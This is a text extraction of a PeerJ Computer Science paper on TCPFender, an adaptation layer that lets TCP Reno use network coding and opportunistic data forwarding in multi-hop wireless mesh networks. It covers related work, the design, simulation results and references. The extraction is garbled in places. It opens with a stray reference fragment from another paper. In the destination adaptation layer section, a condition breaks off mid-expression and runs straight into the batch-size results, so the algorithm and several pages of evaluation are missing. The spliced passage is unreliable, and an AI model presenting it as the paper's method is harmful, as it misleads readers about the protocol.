ambiguation rivaling supervised methods. In Proceed- ings of ACL. 66 work_4ydcpyzirfhf3ma7lkh3dhayqm ---- Submitted 21 May 2016 Accepted 7 September 2016 Published 3 October 2016 Corresponding author Chen Zhang, cz5670@mun.ca Academic editor Baochun Li Additional Information and Declarations can be found on page 16 DOI 10.7717/peerj-cs.89 Copyright 2016 Zhang et al. Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS TCP adaptation with network coding and opportunistic data forwarding in multi-hop wireless networks Chen Zhang1, Yuanzhu Chen1 and Cheng Li2 1 Department of Computer Science, Memorial University of Newfoundland, St. John’s, Canada 2 Department of Electrical and Computer Engineering, Memorial University of Newfoundland, St. John’s, Canada ABSTRACT Opportunistic data forwarding significantly increases the throughput in multi-hop wireless mesh networks by utilizing the broadcast nature of wireless transmissions and the fluctuation of link qualities. Network coding strengthens the robustness of data transmissions over unreliable wireless links. However, opportunistic data forwarding and network coding are rarely incorporated with TCP because the frequent occurrences of out-of-order packets in opportunistic data forwarding and long decoding delay in network coding overthrow TCP’s congestion control. In this paper, we propose a solution dubbed TCPFender, which supports opportunistic data forwarding and network coding in TCP. Our solution adds an adaptation layer to mask the packet loss caused by wireless link errors and provides early positive feedbacks to trigger a larger congestion window for TCP. This adaptation layer functions over the network layer and reduces the delay of ACKs for each coded packet. The simulation results show that TCPFender significantly outperforms TCP/IP in terms of the network throughput in different topologies of wireless networks. Subjects Computer Networks and Communications, Network Science and Online Social Networks Keywords TCP, Network coding, Opportunistic data forwarding, Multi-hop wireless networks INTRODUCTION Wireless mesh networks have emerged as the most common technology for the last mile of Internet access. The Internet provides a platform for rapid and timely information exchanges among clients and servers. Transmission Control Protocol (TCP) has become the most prominent transport protocol on the Internet. Since TCP was originally designed primarily for wired networks that have low bit error rates, moderate packet loss, and packet collisions, the performance of TCP degrades to a greater extent in multi-hop wireless networks, where several unreliable wireless links may be involved in data transmissions (Aguayo et al., 2004; Jain & Das, 2005). However, multi-hop wireless networks have several advantages, including rapid deployment with less infrastructure and less transmission power over multiple short links. Moreover, a high data rate can be achieved by novel cooperation or high link utilization (Larsson, 2001). Some important issues are being addressed by researchers to utilize these capabilities and increase TCP performance in multi-hop wireless networks, such as efficiently searching the ideal path How to cite this article Zhang et al. (2016), TCP adaptation with network coding and opportunistic data forwarding in multi-hop wire- less networks. PeerJ Comput. Sci. 2:e89; DOI 10.7717/peerj-cs.89 https://peerj.com mailto:cz5670@mun.ca https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.89 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ http://dx.doi.org/10.7717/peerj-cs.89 from a source to a destination, maintaining reliable wireless links, protecting nodes from network attacks, reducing energy consumption, and supporting different applications. In multi-hop wireless networks, data packet collision and link quality variation can cause packet losses. TCP often incorrectly assumes that there is congestion, and therefore reduces the sending rate. However, TCP is actually required to transmit continuously to overcome these packets losses. As a result, such a problem causes poor performance in multi-hop wireless networks. There are extensive studies working on these harmful effects. Some studies were proposed to reduce the collision between TCP data packets and TCP acknowledgements or dynamically adjust the congestion window. Other relief may come from network coding. The pioneering paper proposed by Ahlswede et al. (2000) presents the fundamental theory of network coding. Instead of forwarding a single packet at each time, network coding allows nodes to recombine input packets into one or several output packets. Furthermore, network coding is also very well suited for environments where only partial or uncertain data is available for making a decision (Mehta & Narmawala, 2011). The link quality variation in multi-hop wireless networks is widely studied in the opportunistic data forwarding under User Datagram Protocol (UDP). It was traditionally treated as an adversarial factor in wireless networks, where its effect must be masked from upper-layer protocols by automatic retransmissions or strong forwarding error corrections. However, recent innovative studies utilize the characteristic explicitly to achieve opportunistic data forwarding (Biswas & Morris, 2005; Chen, Zhang & Marsic, 2009; Wang, Chen & Li, 2012). Unlike traditional routing protocols, the forwarder in opportunistic routing protocols broadcasts the data packets before the selection of next- hop forwarder. Opportunistic routing protocols allow multiple downstream nodes as candidates to forward data packets instead of using a dedicated next-hop forwarder. Since the broadcasting nature of wireless links naturally supports both network coding and opportunistic data forwarding, many studies work on improving UDP performance in multi-hop wireless networks by opportunistic data forwarding and network coding. However, opportunistic data forwarding and network coding are inherently unsuitable for TCP. The frequent dropping of packets or out-of-order arrivals overthrow TCP’s congestion control. Specifically, opportunistic data forwarding does not attempt to forward packets in the same order as they are injected in the network, so the arrival of packets will be in a different order. Network coding also introduces long coding delays by both the encoding and the decoding processes; besides, it is possible along with some scenarios of not being able to decode packets. These phenomena introduce duplicated ACK segments and frequent timeouts in TCP transmissions, which reduce the TCP throughput significantly. Our proposed protocol, called TCPFender, uses opportunistic data forwarding and network coding to improve TCP throughputs. TCPFender adds an adaptation layer above the network layer to cooperate with TCP’s control feedback loop; it makes the TCP’s congestion control work well with opportunistic data forwarding and network coding. TCPFender proposes a novel feedback-based scheme to detect the network congestion and distinguish duplicated ACKs caused by out-of-order arrivals in opportunistic data forwarding from those caused by network congestion. We compared the throughput of TCPFender and TCP/IP in different topologies of wireless mesh networks, and analyzed the Zhang et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.89 2/19 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.89 influence of batch sizes on the TCP throughput and the end-to-end delay. Since our work adapts the TCPFender to functioning over the network layer without any modification to TCP itself, it is easy to deploy in wireless mesh networks. RELATED WORK Opportunistic data forwarding ExOR (Extreme Opportunistic Routing) is a seminal effort in opportunistic routing protocols (Biswas & Morris, 2005). It is an integrated routing and MAC protocol that exploits the broadcast nature of wireless media. In a wireless mesh network, when a source transmits a data packet to a destination by several intermediate nodes which are decided by the routing module, other downstream nodes not in the routing path, can overhear the transmission. If the dedicated intermediate node, which is in the routing path, fails to receive this packet, other nearby downstream nodes can be scheduled to forward this packet instead of the sender retransmitting. In this case, the total transmission energy consumption and the transmission delay can be reduced, and the network throughput will be increased. Unfortunately, traditional IP forwarding dictates that all nodes without a matching receiver address should drop the packet, and only the node that the routing module selects to be the next hop can keep it for forwarding subsequently, so traditional IP forwarding is easily affected by link quality variation. However, ExOR allows multiple downstream nodes to coordinate and forward packets. The intermediate nodes, which are ‘closer’ to the destination, have a higher priority in forwarding packets towards the destination. ExOR can utilize the transient high quality of links and obtains an opportunistic forwarding gain by taking advantage of transmissions that reach unexpectedly far or fall unexpectedly short. In ExOR, a forwarding schedule is proposed to reduce duplicate transmissions. This schedule guarantees that only the highest priority receiver will forward packets to downstream nodes. However, this ‘strict’ schedule also reduces the possibilities for spatial reuse. The study in (Chachulski et al., 2007) shows that ExOR can have better spatial reuse of wireless media. Furthermore, this schedule may be violated due to frequent packet loss and packet collision. Opportunistic data forwarding with network coding Studies show that network coding can reduce the data packet collision and approach the maximum theoretical capacity of networks (Ahlswede et al., 2000; Li, Yeung & Cai, 2003; Koetter & Médard, 2003; Laneman, Tse & Wornell, 2004; Jaggi et al., 2005; Ho et al., 2006). Many researchers incorporate network coding in opportunistic data forwarding to improve the throughput performance (Chachulski et al., 2007; Lin, Li & Liang, 2008; Lin, Liang & Li, 2010; Zhu et al., 2015). MORE (MAC-independent Opportunistic Routing and Encoding) is practical opportunistic routing protocol based on random linear network coding (Chachulski et al., 2007). In MORE, the source node divides data packets from the upper layer into batches and generates coded packets of each batch. Similar to ExOR, packets in MORE are also forwarded based on a batch. packets with the same batch index can be encoded together. The destination node can decode these coded packets to original packets after receiving enough independently coded packets in the same batch. Zhang et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.89 3/19 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.89 The destination receives enough packets when the decoding matrix reaches the full rank, then these original packets will be pushed to the upper layer. MORE coordinates the forwarding of each node using a transmission credit system, which is calculated based on how effective it would be in forwarding coded data packets to downstream nodes. This transmission credit system reduces the possibility that intermediate nodes forward the same packets in duplication. However, MORE uses a ‘stop-and-wait’ design with a single batch in transmission, which is not efficient utilizing the bandwidth of networks. COPE focuses on inter-session network coding; it is a framework to combine and encode data flows through joint nodes to achieve a high throughput (Basagni et al., 2008). CAOR (Coding Aware Opportunistic Routing) proposes a localized coding-aware opportunistic routing mechanism to increase the throughput of wireless mesh networks. In this protocol, the packet carries out with the awareness of coding opportunities and no synchronization is required among nodes (Yan et al., 2008). NC-MAC improves the efficiency of coding decisions by verifying the decodability of packets before they are transmitted (Argyriou, 2009). The scheme focuses on ensuring correct coding decisions at each network node, and it requires no cross-layer interactions. CodeOR (Coding in Opportunistic Routing) improves MORE in a few important ways (Lin, Li & Liang, 2008). In MORE, the source simply keeps transmitting coded packets belonging to the same batch until the acknowledgment of this batch from the destination has been received. CodeOR allows the source to transmit multiple batches of packets in a pipeline fashion. They also proposed a mathematical analysis in tractable network models to show the way of ‘stop-and-wait’ affects the network throughput, especially in large or long topology. The timely ACKs are transmitted from downstream nodes to reduce the penalty of inaccurate timing in transmitting the next batch. CodeOR applies the ideas of TCP flow control to estimate the correct sending window and the flow control algorithm is similar to TCP Vegas, which uses increased queueing delay as congestion signals. SlideOR works with online network coding (Lin, Liang & Li, 2010), in which data packets are not required to be divided into multiple batches or to be encoded separately in each batch. In SlideOR, the source node encodes packets in overlapping sliding windows such that coded packets from one window position may be useful towards decoding the packets inside another window position. Once a coded packet is ‘seen’ by the destination node, the source node only encodes packets after this seen packet. Since it does not need to encode any packet that is already seen at the destination, SlideOR can transmit useful coded packets and achieve a high throughput. CCACK (Cumulative Coded ACKnowledgment) allows nodes to acknowledge coded packets to upstream nodes with negligible overhead (Koutsonikolas, Wang & Hu, 2011). It utilizes a null space-based (NSB) coded feedback vector to represent the entire decoding matrix. CodePipe is a reliable multicast protocol, which improves the multicast throughput by exploiting both intra and inter network coding (Li et al., 2012). CORE (Coding-aware Opportunistic Routing mEchanism) combines inter-session and intra-session network coding (Krigslund et al., 2013). It allows nodes in the network to setup inter-session coding regions where packets from different flows can be XORed. Packets from the same flow uses random linear network coding for intra-session coding. CORE provides a solution to cope Zhang et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.89 4/19 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.89 with the unreliable overhearing and improves the throughput performance in multi-hop wireless networks. NCOR focuses on how to select the best candidate forwarder set and allocate traffic among candidate forwarders to approach optimal routing (Cai et al., 2014). It contracts a relationship tree to describe the child-parent relations along the path from the source to the destination. The cost of the path is the sum of the costs of each constituent hyperlink for delivering one unit of information to the destination. The nodes, which create the path with the minimum cost, can be chosen as candidate forwarders. Hsu et al. (2015) proposed a stochastic dynamic framework to minimize a long-run average cost. They also analyzed the problem of whether to delay packet transmission in hopes that a coding pair will be available in the future or transmit a packet without coding. Garrido et al. (2015) proposed a cross-layer technique to balance the load between relaying nodes based on bandwidth of wireless links, and they used an intra-flow network coding solution modelled by means of Hidden Markov Processes. However, the schemes above were designed to utilize opportunistic data forwarding and network coding, but none of these was designed to support TCP. Network coding in TCP A number of recent papers have utilized network coding to improve TCP throughput. In particular, (Huang et al., 2008) introduce network coding to TCP traffic, where data segments in one direction and ACK segments in the opposite direction can be coded at intermediate nodes. The simulation showed that making a small delay at each intermediate node can increase the coding opportunity and increase the TCP throughput. TCP/NC enables a TCP-compatible sliding-window approach to utilize network coding (Sundararajan et al., 2011). Such a variant of TCP is based on ACK-based sliding-window network coding approach and improves the TCP throughput in lossy links. It uses the degree of freedom in the decoding matrix instead of the number of received original packets as the sequence number in ACK. If a received packet increases the degree of freedom in the decoding matrix, this packet is called an innovative packet and this packet is ‘seen’ by the destination. The destination node will generate an acknowledgment whenever a coded packet is seen instead of producing an original packet. However, TCP/NC cannot efficiently control the waiting time for the decoding matrix to become full rank, and the packet loss can make TCP/NC’s decoding matrix very large, which causes a long packet delay (Sun et al., 2015). TCP-VON introduces online network coding (ONC) to TCP/NC, which can smoothly increase the receiving data rate and packets can be decoded quickly by the destination node. However, these protocols are variants of RTT-based congestion control TCP protocols (e.g., Vegas), which limits their applications in practice since most TCP protocols are loss-based congestion control (Bao et al., 2012). TCP-FNC proposes two algorithms to increase the TCP throughput (Sun et al., 2015). One is a feedback based scheme to reduce the waiting delay. The other is an optimized progressive decoding algorithm to reduce computation delay. It can be applied to loss-based congestion control, but it does not take advantage of opportunistic data forwarding. Since TCP-FNC is based on traditional IP forwarding, it is easily affected by link quality variation. ComboCoding (Chen et al., 2011) uses both inter- and intra-flow networking to support TCP with deterministic Zhang et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.89 5/19 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.89 Figure 1 TCPFender design scheme. routing. The inter-flow coding is done between the data flows of the two directions of the same TCP session. The intra-flow coding is based on random linear coding serving as a forward-error correction mechanism. It has an adaptive redundancy to overcome variable packet loss rates over wireless links. However, ComboCoding was not designed for opportunistic data forwarding. Contribution of TCPFender Opportunistic data forwarding and network coding do not inherently support TCP, so many previous research on opportunistic data forwarding and network coding were not designed for TCP. Other studies modified TCP protocols by cooperating network coding into TCP protocols; these work created different variants of TCP protocols to improve the throughput. However, TCP protocols (especially, TCP Reno) are widely deployed in current communication systems, it is not easy work to modify all TCP protocols of the communication systems. Therefore, we propose an adaptation layer (TCPFender) functioning below TCP Reno. With the help of TCPFender, TCP Reno do not make any change to itself and it can take advantage of both network coding and opportunistic data forwarding. DESIGN OF TCPFENDER Overview of TCPFender We introduce TCPFender as an adaptation layer above the network layer, which hides network coding and opportunistic forwarding from the transport layer. The process of TCPFender is shown in Fig. 1. It confines the modification of the system only under the network layer. The goal of TCPFender is to improve TCP throughput in wireless mesh networks by opportunistic data forwarding and network coding. However, opportunistic data forwarding in wireless networks causes many dropped packets and out-of-order arrivals, and it is difficult for TCP sender to maintain a large congestion window. Especially the underlying link layer is the stock IEEE 802.11, which only provides standard unreliable Zhang et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.89 6/19 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.89 broadcast or reliable unicast (best effort with a limited number of retransmissions). TCP has its own interpretation of the arrival (or absence) of the ACK segments and their timing. It opens up its congestion window based on continuous ACKs coming in from the destination. The dilemma is that when packets arrive out of order or are dropped, the TCP receiver cannot signal the sender to proceed with the expected ACK segment. Unfortunately, opportunistic data forwarding can introduce many out-of-order arrivals, which can significantly reduce the congestion window size of regular TCP since it increases the possibility of duplicated ACKs. Furthermore, the long decoding delay for batch-based network coding does not fare well with TCP, because it triggers excessive time-out events. The TCPFender adaptation layer at the receiving side functions over the network layer and provides positive feedback early on when innovative coded packets are received, i.e., suggesting that more information has come through the network despite not being decoded for the time being. This process helps the sender to open its congestion window and trigger fast recovery when the receiving side acknowledges the arrival of packets belonging to a later batch, in which case the sending side will resend dropped packets of the unfinished batch. On the sender side, the ACK signalling module is able to differentiate duplicated ACKs and filter useless ACKs (shown in Fig. 1). TCPFender algorithm To better support TCP with opportunistic data forwarding and network coding, TCPFender inserts the TCP adaptation layer above the network work layer at the source, the forwarder, and the destination. The main work of the TCP adaptation layer is to interpret observations of the network layer phenomena in a way that is understandable by TCP. The network coding module in the adaptation layer is based on a batch-oriented network coding operation. The original TCP packets are grouped into batches, where all packets in the same batch carry encoding vectors on the same basis. At the intermediate nodes, packets will be recoded and forwarded following the schedule of opportunistic data forwarding proposed by MORE, which proposes a transmission credit system to describe the duplication of packets. This transmission credit system can compensate the packet loss, increase the reliability of the transmission, and represent the schedule of opportunistic data forwarding. The network coding module in the destination node will try to decode received coded packets to original packets when it receives any coded packet. The ACK signalling modules at the source and the destination are responsible for translation between TCP ACKs and TCPFender ACKs. Network Coding in TCPFender We implement batch-oriented network coding operations at the sender and receiver to support TCP transmissions. All data pushed down by the transport layer in sender are grouped into batches, and each batch has a fixed number β (β=10 in our implementation) of packets of equal length (with possible padding). When the source has accumulated packets in a batch, these packets are coded with random linear network coding, tagged with the encoding vectors, and transmitted to downstream nodes. The downstream nodes are any nodes in the network closer to the destination. Any downstream node can recode and Zhang et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.89 7/19 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.89 forward packets when it receives a sufficient number of them. We use transmission credit mechanism, as proposed in MORE, to balance the number of packets to be forwarded in intermediate nodes. We make two important changes to improve the network coding process of MORE for TCP transmissions. For a given batch, the source does not need to wait until the last packet of a batch from the TCP before transmitting coded packets. We call this accumulative coding. That is, if k packets (k <β) have been sent down by TCP at a point of time, a random linear combination of these k packets is created and transmitted. Initially, the coded packets only include information for the first few TCP data segments of the batch, but will include more towards the end of the batch. The reason for this ‘‘early release’’ behaviour is for the TCP receiving side to be able to provide early feedback for the sender to open up the congestion window. On the other hand, we use a deeper pipelining than MORE where we allow multiple batches to flow in the network at the same time. To do that, the sending side does not need to wait for the batch acknowledgement before proceeding with the next batch. In this case, packets of a batch are labeled with a batch index for differentiation, in order for TCP to have a stable, large congestion window size rather than having to reset it to 1 for each new batch. The cost of such pipelining is that all nodes need to maintain packets for multiple batches. Source adaptation layer The source adaptation layer buffers all original packets of a batch that have not been acknowledged. The purpose is that when TCP pushes down a new data packet or previously sent data packet due to a loss event, the source adaptation layer can still mix it with other data packets of the same batch. The ACK signalling module can discern duplicated ACKs which are not in fact caused by the network congestion. Opportunistic data forwarding may cause many extra coded packets, specifically when some network links are of the high quality at a certain point. This causes the destination node to send multiple ACKs with same sequence number. In this case, such duplicated ACKs are not a signal for the network congestion, and should be treated differently by the ACK signalling module in the source. These two cases of duplicated ACKs can actually be differentiated by tagging the ACKs with the associated sequence numbers of the TCP data segment. These ACKs are used by the TCPFender adaptation layer at the source and the destination and should be converted to original TCP ACKs before being delivered to the upper layer. The flow of data or ACKs transmissions is shown in the left of Fig. 1. Original TCP data segments are generated and delivered to the module of ‘‘network coding and opportunistic forwarding’’. Here, TCP data segments may be distributed to several batches based on their TCP segment sequences, so the retransmitted packets will be always in the same batch as their initial distribution. After the current TCP data segment mixes with packets in a batch, TCPFender data segments will be generated and injected to network via hop-by-hop IP forwarding, which is essentially broadcasting of IP datagrams. On the ACK signalling module, when it receives TCPFender ACKs, if the ACK’s sequence number is greater than the maximum received ACK sequence number, this ACK will be translated into a TCP ACK and delivered to the TCP sender. Otherwise, the ACK signalling module will check Zhang et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.89 8/19 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.89 whether this duplicated ACK is caused by opportunistic data forwarding or not. Then it will decide whether to forward a TCP ACK to the TCP or not. The reason for differentiating duplicated ACKs at the source instead of at the destination is to reduce the impact of ACK loss on TCP congestion control. Destination adaptation layer The main function of the destination adaptation layer is to generate ACKs and detect congestion in the network. It expects packets in the order of increasing batch index. For example, when it is expecting the bth batch, it implies that it has successfully received packets of the previous b−1 batches and delivered them up to the TCP layer. In this case, it is only interested in and buffers packets of the bth batch or later. However, the destination node may receive packets of any batch. Suppose that the destination node is expecting the bth batch, and that the rank of the decoding matrix of this batch is r. In this case, the destination node has ‘‘almost’’ received β×(b−1)+r packets of the TCP flow, where β×(b−1) packets have been decoded and pushed up the TCP receiver, and r packets are still in the decoding matrix. When it receives a coded packet of the b′th batch, if b′40), the increment of the batch size will decrease the Zhang et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.89 13/19 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.89 Figure 8 Throughput and delay for grid topology and mesh topology. Figure 9 Throughput and delay for different batch sizes. throughput because the increase of batch size will amplify the fluctuation of the congestion window and also increase packet overhead by long encoding vectors. The Fig. 10 also describes how many packets are transmitted in the network. Each intermediate node will keep all unfinished batches. From the Fig. 10, since the number of packets transmitted in the network is smaller than two batch sizes, intermediate nodes only need to keep two Zhang et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.89 14/19 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.89 Figure 10 Evolution of congestion window for three different batch sizes simulated in the mesh topol- ogy. Figure 11 Delay for two specific cases with batch sizes of 10 and 40. batches of packets and the memories required to store the packets are acceptable. The nature of batch-based network coding will also introduce decoding delays, so the batch size has a direct impact on the end-to-end delay, as summaries in Fig. 9. In Fig. 11, we plotted the end-to-end delays of all packets over time in two sample simulations. Note that these tests were done for files that need many batches to carry. On the other hand, when the file size is comparable to the batch size, the file-wise delay will be comparable to the decoding Zhang et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.89 15/19 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.89 delay of an entire batch, which may seem large relatively. However, because the file size is small, this delay is not overly significant as the delay is at the order of its transmission time. Nevertheless, network coding does add considerable amount of delay in comparison to pure TCP/IP. CONCLUDING REMARKS In this paper, we proposed TCPFender, which is a novel mechanism to support TCP with network coding and opportunistic data forwarding. TCPFender completes the control feedback loop of TCP by creating a bridge between the adaptation modules of the sender and the receiver. The sender adaptation layer in TCPFender differentiates duplicate ACKs caused by network congestion from these caused by opportunistic data forwarding, and the receiver side releases ACK segments whenever receiving an innovative packet. In current work, we implemented our algorithm to support TCP Reno. In fact, TCPFender can also support other TCP protocols with loss-based congestion control (e.g., TCP-NewReno, TCP-Tahoe). The adaptive modules are designed generally enough to not only support network coding and opportunistic data forwarding, but also any packet forwarding techniques that can cause many dropping packets or out-of-order arrivals. One example will be multi-path routing, where IP packets of the same data flow can follow different paths from the source to the destination. By simulating how the TCP receiver will signal the TCP sender, we are able to adapt TCPFender to functioning over such the multi-path routing without having to modify TCP itself. In the simulation results, we compared TCPFender and TCP/IP in four different network topologies. The result shows that TCPFender has a sizeable throughput gain over TCP/IP, and the gain will be very distinct from each other when the link quality is not that good. We also discussed the influence of batch size on the network throughput and end-to-end packet delay. In general, the bath size has a small impact on the network throughput, but it has direct impact on end-to-end packet delay. In future, we will consider TCP protocols with RTT-based congestion control and also analyze how multiple TCP flows interact with each other in a network coded, opportunistic forwarding network layer, or a more generally error-prone network layer. We will refine the redundancy factor and the bandwidth estimation to optimize the congestion control feedback of TCP. Finally, we will propose a theoretical model of TCP with opportunistic forwarding and network coding, which will enable us to study the TCPFender as a function in various communication systems. ADDITIONAL INFORMATION AND DECLARATIONS Funding This work was supported in part by the Natural Sciences and Engineering Research Council (NSERC) of Canada (Discovery Grants 293264-12 and 327667-2010, and Strategic Project Grant STPGP 397491-10). The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Zhang et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.89 16/19 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.89 Grant Disclosures The following grant information was disclosed by the authors: Natural Sciences and Engineering Research Council (NSERC) of Canada: 293264-12, 327667-2010. Strategic Project Grant STPGP: 397491-10. Competing Interests The authors declare there are no competing interests. Author Contributions • Chen Zhang, Yuanzhu Chen and Cheng Li conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. Data Availability The following information was supplied regarding data availability: GitHub: https://github.com/UploadForPeerJ/NS-2.35. REFERENCES Aguayo D, Bicket J, Biswas S, Judd G, Morris R. 2004. Link-level measurements from an 802.11b mesh network. In: Proceedings of the 2004 conference on applications, technologies, architectures, and protocols for computer communications (SIGCOMM), vol. 34. New York: ACM, 121–132. Ahlswede R, Cai N, Shuo-Yen, Li R, Yeung RW. 2000. Network information flow. Information Theory 46(4):1204–1216 DOI 10.1109/18.850663. Argyriou A. 2009. Wireless network coding with improved opportunistic listening. IEEE Transactions on Wireless Communications 8(4):2014–2023 DOI 10.1109/TWC.2009.080396. Bao W, Shah-Mansouri V, Wong VW, Leung VC. 2012. TCP VON: joint congestion control and online network coding for wireless networks. In: Global communications conference (GLOBECOM). Piscataway: IEEE, 125–130. Basagni S, Conti M, Giordano S, Stojmenovic I. 2008. XORs in the air: practical wireless network coding. IEEE/ACM Transactions on Networking 16(3):497–510 DOI 10.1109/TNET.2008.923722. Biswas S, Morris R. 2005. ExOR: opportunistic multi-hop routing for wireless networks. In: Proceedings of the ACM SIGCOMM conference on applications, technologies, architectures, and protocols for computer communications (SIGCOMM). New York: ACM, 133–144. Cai S, Zhang S, Wu G, Dong Y, Znati T. 2014. Minimum cost opportunistic routing with intra-session network coding. In: IEEE international conference on communications (ICC). Piscataway: IEEE, 502-507. Zhang et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.89 17/19 https://peerj.com https://github.com/UploadForPeerJ/NS-2.35 http://dx.doi.org/10.1109/18.850663 http://dx.doi.org/10.1109/TWC.2009.080396 http://dx.doi.org/10.1109/TNET.2008.923722 http://dx.doi.org/10.7717/peerj-cs.89 Chachulski S, Jennings M, Katt S, Katabi D. 2007. Trading structure for randomness in wireless opportunistic routing. ACM SIGCOMM Computer Communication Review 37(12):169–180 DOI 10.1145/1282427.1282400. Chen C-C, Chen C, Oh SY, Park J-S, Gerla M, Sanadidi MY. 2011. ComboCoding: Combined intra-/inter-flow network coding for TCP over disruptive MANETs. Journal of Advanced Research 2:241–252 DOI 10.1016/j.jare.2011.05.002. Chen Y, Zhang J, Marsic I. 2009. Link-Layer-and-above diversity in multi-hop wireless networks. IEEE Communications Magazine 47(2):118–124 DOI 10.1109/MCOM.2009.4785389. Couto DSJD, Aguayo D, Bicket J, Morris R. 2003. A high-throughput path metric for multi-hop wireless routing. In: Proceedings of the 9th annual international conference on mobile computing and networking (MobiCom). New York: ACM, 134–146. Garrido P, Gómez D, Agüero R, Serrat J. 2015. Combination of random linear coding and cross-layer opportunistic routing: Performance over bursty wireless channels. In: IEEE 26th annual international symposium on personal, indoor, and mobile radio communications (PIMRC). Piscataway: IEEE, 1692–1696. Ho T, Médard M, Koetter R, Karger DR, Effros M, Shi J, Leong B. 2006. A random linear network coding approach to multicast. IEEE Transmission on Information Theory 52(10):4413–4430 DOI 10.1109/TIT.2006.881746. Hsu Y-P, Abedini N, Gautam N, Sprintson A, Shakkottai S. 2015. Opportunities for network coding: to wait or not to wait. IEEE/ACM Transactions on Networking 23(6):1876–1890 DOI 10.1109/TNET.2014.2347339. Huang Y, Ghaderi M, Towsley D, Gong W. 2008. TCP performance in coded wireless mesh networks. In: Sensor, mesh and ad hoc communications and networks (SECON). Piscataway: IEEE, 179–187. Jaggi S, Sanders P, Chou PA, Effros M. 2005. Polynomial time algorithms for multicast network code construction. IEEE Transmission on Information Theory 51:1973–1982 DOI 10.1109/TIT.2005.847712. Jain S, Das S. 2005. Exploiting path diversity in the link layer in wireless ad hoc networks. In: World of wireless mobile and multimedia networks (WoWMoM). Piscataway: IEEE, 22–30. Koetter R, Médard M. 2003. An algebraic approach to network coding. IEEE Transmis- sion on Networking 11(5):782–795 DOI 10.1109/TNET.2003.818197. Koutsonikolas D, Wang C-C, Hu YC. 2011. Efficient network-coding-based opportunis- tic routing through cumulative coded acknowledgments. IEEE/ACM Transactions on Networking (TON) 19(5):1368–1381 DOI 10.1109/TNET.2011.2111382. Krigslund J, Hansen J, Hundeboll M, Lucani DE, Fitzek FHP. 2013. CORE: COPE with MORE in wireless meshed networks. In: Vehicular technology conference (VTC Spring), 1–6. Laneman JN, Tse DNC, Wornell GW. 2004. Cooperative diversity in wireless networks: efficient protocols and outage behavior. IEEE Transmission on Information Theory 50(12):3062–3080 DOI 10.1109/TIT.2004.838089. Zhang et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.89 18/19 https://peerj.com http://dx.doi.org/10.1145/1282427.1282400 http://dx.doi.org/10.1016/j.jare.2011.05.002 http://dx.doi.org/10.1109/MCOM.2009.4785389 http://dx.doi.org/10.1109/TIT.2006.881746 http://dx.doi.org/10.1109/TNET.2014.2347339 http://dx.doi.org/10.1109/TIT.2005.847712 http://dx.doi.org/10.1109/TNET.2003.818197 http://dx.doi.org/10.1109/TNET.2011.2111382 http://dx.doi.org/10.1109/TIT.2004.838089 http://dx.doi.org/10.7717/peerj-cs.89 Larsson P. 2001. Selection diversity forwarding in a multihop packet radio network with fading channel and capture. ACM SIGMOBILE Mobile Computing and Communica- tions Review 5(4):47–54 DOI 10.1145/509506.509517. Li P, Guo S, Yu Sh, Vasilakos AV. 2012. CodePipe: an opportunistic feeding and routing protocol for reliable multicast with pipelined network coding. In: INFOCOM. Piscataway: IEEE, 100–109. Li S-YR, Yeung RW, Cai N. 2003. Linear network coding. IEEE Transmission on Informa- tion Theory 49(2):371–381 DOI 10.1109/TIT.2002.807285. Lin Y, Li B, Liang B. 2008. CodeOR: opportunistic routing in wireless mesh networks with segmented network coding. In: IEEE International conference on network protocols (ICNP). Piscataway: IEEE, 13–22. Lin Y, Liang B, Li B. 2010. slideOR: online opportunistic network coding in wireless mesh networks. In: INFOCOM, 2010 proceedings IEEE. Piscataway: IEEE, 1–5. Mehta T, Narmawala Z. 2011. Survey on multimedia transmission using network coding over wireless networks. In: Nirma university international conference on engineering, 1–6. Sun J, Zhang Y, Tang D, Zhang S, Zhao Z, Ci S. 2015. TCP-FNC: a novel TCP with network coding for wireless networks. In: International conference on communications (ICC). Piscataway: IEEE,. Sundararajan JK, Shah D, Medard M, Jakubczak S, Mitzenmacher M, Barros J. 2011. Network coding meets TCP: theory and implementation. Proceedings of the IEEE 99(3):490–512 DOI 10.1109/JPROC.2010.2093850. Wang Z, Chen Y, Li C. 2012. CORMAN: a novel cooperative opportunistic routing scheme in mobile ad hoc networks. IEEE Journal on Selected Areas in Communica- tions 30(2):289–296 DOI 10.1109/JSAC.2012.120207. Yan Y, Zhang B, Mouftah HT, Ma J. 2008. Practical coding-aware mechanism for opportunistic routing in wireless mesh networks. In: IEEE international conference on communications. Piscataway: IEEE, 2871–2876. Zhu D, Yang X, Yu W, Lu C, Fu X. 2015. INCOR: inter-flow Network Coding based opportunistic routing in wireless mesh networks. In: IEEE international conference on communications (ICC). Piscataway: IEEE, 3666–3671. Zhang et al. (2016), PeerJ 